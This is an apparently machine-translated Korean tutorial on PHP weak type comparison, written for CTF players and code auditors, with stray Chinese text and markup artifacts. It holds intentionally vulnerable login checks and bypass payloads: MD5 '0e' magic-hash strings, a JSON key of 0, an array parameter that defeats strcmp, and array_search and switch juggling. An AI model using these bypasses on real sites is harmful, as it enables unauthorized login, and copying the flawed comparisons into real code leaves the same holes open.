이 기사에서 공유한 내용은 PHP의 약한 유형 변환에 관한 것입니다. 이 내용은 도움이 필요한 친구들에게 큰 도움이 되기를 바랍니다.
최근 CTF 대회에서 PHP 약한 유형에 대한 질문이 여러 번 나왔습니다. PHP 약한 유형과 이를 우회하는 방법을 요약하고 싶습니다.
php에는 ==와 ===
1 <?php 2 $a = $b ; 3 $a===$b ; 4 ?>
=== 두 가지 비교 기호가 있습니다. 두 문자열의 타입이 같은지 먼저 판단 후 비교
== 비교 시 문자열 타입을 먼저 동일하게 변환한 후 비교
如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行
#🎜 🎜#여기서는 값을 문자열과 비교하면 문자열이 값으로 변환된다고 명시되어 있습니다.
1 <?php 2 var_dump("admin"==0); //true 3 var_dump("1admin"==1); //true 4 var_dump("admin1"==1) //false 5 var_dump("admin1"==0) //true 6 var_dump("0e123456"=="0e4456789"); //true 7 ?> //上述代码可自行测试
2 "1admin"==1 일 때 비교하면 1admin이 숫자로 변환되어 결과가 1이 되는데 "admin1"==1은 오류, 즉 "admin1"이 0으로 변환되는 이유는 무엇일까요? ? 3 "0e123456"=="0e456789" 0e와 같은 문자열은 서로 비교하면 과학기술법상 숫자로 인식됩니다. 0의 거듭제곱은 0이므로 같습니다#🎜🎜 #
# 🎜🎜#
위 문제에 대해서는 php 매뉴얼을 확인해보니
문자열을 숫자로 처리할 경우 결과와 타입은 다음과 같습니다: 문자열에 '.', 'e', 'E'가 포함되지 않고 해당 숫자 값이 정수 문자열의 범위 내에 있는 경우#문자열은 int로 처리되며, 그 외의 모든 문자열은 int로 처리됩니다. float로 처리되는 경우 문자열의 시작 부분이 해당 값을 결정합니다. 문자열이 유효한 값으로 시작하면 해당 값이 사용됩니다. 그렇지 않으면 해당 값은 0입니다.
1 <?php 2 $test=1 + "10.5"; // $test=11.5(float) 3 $test=1+"-1.3e3"; //$test=-1299(float) 4 $test=1+"bob-1.3e3";//$test=1(int) 5 $test=1+"2admin";//$test=3(int) 6 $test=1+"admin2";//$test=1(int) 7 ?>
1 <?php 2 if (isset($_GET['Username']) && isset($_GET['password'])) { 3 $logined = true; 4 $Username = $_GET['Username']; 5 $password = $_GET['password']; 6 7 if (!ctype_alpha($Username)) {$logined = false;} 8 if (!is_numeric($password) ) {$logined = false;} 9 if (md5($Username) != md5($password)) {$logined = false;} 10 if ($logined){ 11 echo "successful"; 12 }else{ 13 echo "login failed!"; 14 } 15 } 16 ?>
소개 1 0e로 시작하는 배치 md5 문자열은 위에 언급되어 있습니다.
0e는 비교 시 과학적 표기법으로 간주되므로 0e 뒤에 무엇이 오더라도 0의 거듭제곱은 여전히 0입니다#🎜 🎜# .md5('240610708') == md5('QNKCDZO')
우회에 성공했습니다!QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514
<?php if (isset($_POST['message'])) { $message = json_decode($_POST['message']); $key ="*********"; if ($message->key == $key) { echo "flag"; } else { echo "fail"; } } else{ echo "~~~~"; } ?>
최종 페이로드 메시지={"key":0}
array_search is_array 우회1 <?php 2 if(!is_array($_GET['test'])){exit();} 3 $test=$_GET['test']; 4 for($i=0;$i<count($test);$i++){ 5 if($test[$i]==="admin"){ 6 echo "error"; 7 exit(); 8 } 9 $test[$i]=intval($test[$i]); 10 } 11 if(array_search("admin",$test)===0){ 12 echo "flag"; 13 } 14 else{ 15 echo "false"; 16 } 17 ?>
mixed array_search ( mixed $needle , array $haystack [, bool $strict = false ] )
$needle, $haystack은 필수, $strict는 선택 사항입니다. 이 함수는 $haystack의 값이 $needle에 있는지 확인하고 해당 키 값을 반환합니다. 세 번째 매개변수의 기본값은 false입니다. true로 설정하면 엄격한 필터링이 수행됩니다.
1 <?php 2 $a=array(0,1); 3 var_dump(array_search("admin",$a)); // int(0) => 返回键值0 4 var_dump(array_seach("1admin",$a)); // int(1) ==>返回键值1 5 ?>
array_search 함수는 ==와 유사합니다. 즉, $a=="admin" 물론 $a=0 물론 세 번째 매개변수가 true이면 우회할 수 없습니다# 🎜🎜#
strcmp 취약점 우회 php -v <5.31 <?php 2 $password="***************" 3 if(isset($_POST['password'])){ 4 5 if (strcmp($_POST['password'], $password) == 0) { 6 echo "Right!!!login success";n 7 exit(); 8 } else { 9 echo "Wrong password.."; 10 } 11 ?>
payload: 비밀번호[]=xxx
switch Bypass
1 <?php 2 $a="4admin"; 3 switch ($a) { 4 case 1: 5 echo "fail1"; 6 break; 7 case 2: 8 echo "fail2"; 9 break; 10 case 3: 11 echo "fail3"; 12 break; 13 case 4: 14 echo "sucess"; //结果输出success; 15 break; 16 default: 17 echo "failall"; 18 break; 19 } 20 ?>
이 원리는 앞의 원리와 유사하므로 자세히 설명하지 않겠습니다
4 요약
이러한 PHP 약한 유형은 위의 내용은 코드 감사의 중요성을 확인합니다
관련 권장 사항:
#🎜 🎜#PHP에서 var 키워드 사용 예
php 대기열 처리: PHP 메시지 대기열 구현 원리(그림 및 텍스트)
위 내용은 PHP에서 약한 유형 변환 구현의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!